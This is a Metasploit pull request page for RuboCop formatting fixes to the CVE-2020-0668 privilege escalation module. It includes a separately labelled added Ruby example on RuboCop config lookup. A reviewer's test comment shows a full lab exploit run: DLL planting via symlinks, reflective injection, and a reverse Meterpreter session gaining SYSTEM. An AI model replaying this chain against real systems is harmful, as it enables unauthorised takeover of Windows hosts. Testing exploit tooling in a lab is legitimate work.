RuboCop autofix exploit/windows/local/cve_2020_0668_service_tracing #13585

Merged
merged 2 commits into from Jun 10, 2020

Conversation

wvu
Contributor

@wvu wvu commented Jun 9, 2020

It looks like RuboCop was run on this file without our .rubocop.yml? The formatting is all messed up from the default RuboCop rules.

#13322
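Added example, not code from this PR or from Metasploit: RuboCop resolves its configuration by searching the inspected file's directory and its parents for a .rubocop.yml, so running it on a copy of a module that sits outside the repository checkout (or from a directory above it) silently applies the bundled default rules instead of the project's. The snippet below re-implements that lookup in simplified form (it is not RuboCop's own ConfigLoader), builds a fake repo layout in a temp dir to show the two outcomes, and prints the invocation with `-c` pinned so the result does not depend on the working directory. The helper names and the temp-dir layout are assumptions for the demo.

```ruby
require 'tmpdir'
require 'fileutils'

CONFIG_NAME = '.rubocop.yml'

# Simplified version of RuboCop's config discovery: walk from the file's
# directory up towards the root and return the first .rubocop.yml found.
# Returns nil when none exists; RuboCop would then fall back to
# ~/.rubocop.yml or its bundled default.yml, which is the situation the
# PR describes. stop_at bounds the walk so the demo never leaves its tmpdir.
def resolve_rubocop_config(file, stop_at: '/')
  dir = File.expand_path(File.dirname(file))
  stop = File.expand_path(stop_at)
  loop do
    candidate = File.join(dir, CONFIG_NAME)
    return candidate if File.file?(candidate)
    return nil if dir == stop || dir == File.dirname(dir)
    dir = File.dirname(dir)
  end
end

# Build an autocorrect command that pins the config explicitly (-c/--config),
# so a reviewer can reproduce the run regardless of where the file lives.
def rubocop_command(file, config)
  if config
    "rubocop -a -c #{config} #{file}"
  else
    "rubocop -a #{file}  # WARNING: no project config found, default rules apply"
  end
end

# Constructed demo layout (assumption): a fake checkout containing
# .rubocop.yml and a module, plus a copy of the module outside the checkout.
# Returns [config_for_in_repo_copy, config_for_outside_copy].
def demo
  Dir.mktmpdir do |root|
    repo = File.join(root, 'metasploit-framework')
    mod_dir = File.join(repo, 'modules', 'exploits', 'windows', 'local')
    FileUtils.mkdir_p(mod_dir)
    File.write(File.join(repo, CONFIG_NAME), "Layout/LineLength:\n  Max: 180\n")

    inside = File.join(mod_dir, 'cve_2020_0668_service_tracing.rb')
    File.write(inside, "# module source placeholder\n")

    outside = File.join(root, 'scratch', 'cve_2020_0668_service_tracing.rb')
    FileUtils.mkdir_p(File.dirname(outside))
    FileUtils.cp(inside, outside)

    [inside, outside].each do |f|
      cfg = resolve_rubocop_config(f, stop_at: root)
      puts rubocop_command(f, cfg)
    end

    [resolve_rubocop_config(inside, stop_at: root),
     resolve_rubocop_config(outside, stop_at: root)]
  end
end

demo if $PROGRAM_NAME == __FILE__
```

Running it prints one command that carries `-c .../metasploit-framework/.rubocop.yml` for the in-repo copy and a warning line for the copy in `scratch/`; the practical takeaway is to run RuboCop from inside the checkout or always pass `-c` to the project's file.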

@wvu wvu added module code quality Improving code quality labels Jun 9, 2020
@wvu wvu requested a review from bwatters-r7 June 9, 2020 23:25
@bwatters-r7 bwatters-r7 self-assigned this Jun 9, 2020
@bwatters-r7
Contributor

msf5 exploit(windows/local/cve_2020_0668_service_tracing) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Build Number = 17134
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 3
[*] Payload DLL is 5120 bytes long
[*] Registry hash = [{:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"EnableFileTracing", :value_type=>"REG_DWORD", :value_value=>1, :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"FileDirectory", :value_type=>"REG_EXPAND_SZ", :value_value=>"C:\\Users\\msfuser\\AppData\\Local\\Temp\\spZODpOx", :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"MaxFileSize", :value_type=>"REG_DWORD", :value_value=>5119, :delete_on_cleanup=>false}]
[*] Making C:\Users\msfuser\AppData\Local\Temp\spZODpOx on DESKTOP-D1E425Q
[*] Creating directory C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Meterpreter Session
[*] C:\Users\msfuser\AppData\Local\Temp\spZODpOx created
[*] Made C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Creating mountpoint
[+] Successfuly opened C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\QRWJnIts.dll
[*] Payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Creating Symlinks
[*] Creating symlink C:\Users\msfuser\AppData\Local\Temp\QRWJnIts.dll in \RPC Control\RASTAPI.LOG
[*] Collected Symlink Handle 824
[*] Creating symlink C:\Windows\system32\WindowsCoreDeviceInfo.dll in \RPC Control\RASTAPI.OLD
[*] Collected Symlink Handle 840
[*] Writing EnableFileTracing to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing FileDirectory to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing MaxFileSize to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Uploading phonebook to DESKTOP-D1E425Q as C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk from /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2020-0668/phonebook.txt
[*] Phonebook uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk
[*] Launching Rasdialer
[*] Running Rasdialer with phonebook C:\Users\msfuser\AppData\Local\Temp\pXzmVD.pbk
[*] Connecting to VPNTEST...

Remote Access error 807 - The network connection between your computer and the VPN server was interrupted.  This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity.  Please try to reconnect to the VPN server.  If this problem persists, contact the VPN administrator and analyze quality of network connectivity.

For more help on this error:
	Type 'hh netcfg.chm'
	In help, click Troubleshooting, then Error Messages, then 807
[*] Checking on C:\Windows\system32\WindowsCoreDeviceInfo.dll
[*] Upload payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Moved payload md5 = e21d336dcd00ec3d1e872159e0b65113
[*] Cleaning up before triggering dll load...
[*] Removing Registry keys
[*] Deleting EnableFileTracing from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting FileDirectory from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting MaxFileSize from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Removing Symlinks
[*] Closing symlink handle 824: The operation completed successfully.
[*] Closing symlink handle 840: The operation completed successfully.
[*] Removing Mountpoint
[*] Removing directories
[*] Trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 8812 launched.
[*] Reflectively injecting the trigger DLL into 8812...
[*] Trigger injected.
[*] Trigger injected. Starting thread...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[!] Manual cleanup after reboot required for C:\Windows\system32\WindowsCoreDeviceInfo.dll and C:\Users\msfuser\AppData\Local\Temp\spZODpOx
[*] Exploit complete.  It may take up to 10 minutes to get a session
[*] Sending stage (201283 bytes) to 192.168.132.125
[*] Meterpreter session 4 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2020-06-10 07:28:19 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit 2881a41 into rapid7:master Jun 10, 2020
@bwatters-r7
Contributor

Release Notes

Rubocop autofixes to exploit/windows/local/cve_2020_0668_service_tracing

@wvu wvu deleted the bug/rubocop branch June 10, 2020 15:15
@tperry-r7 tperry-r7 added rn-enhancement release notes enhancement rn-no-release-notes no release notes and removed rn-enhancement release notes enhancement labels Jun 25, 2020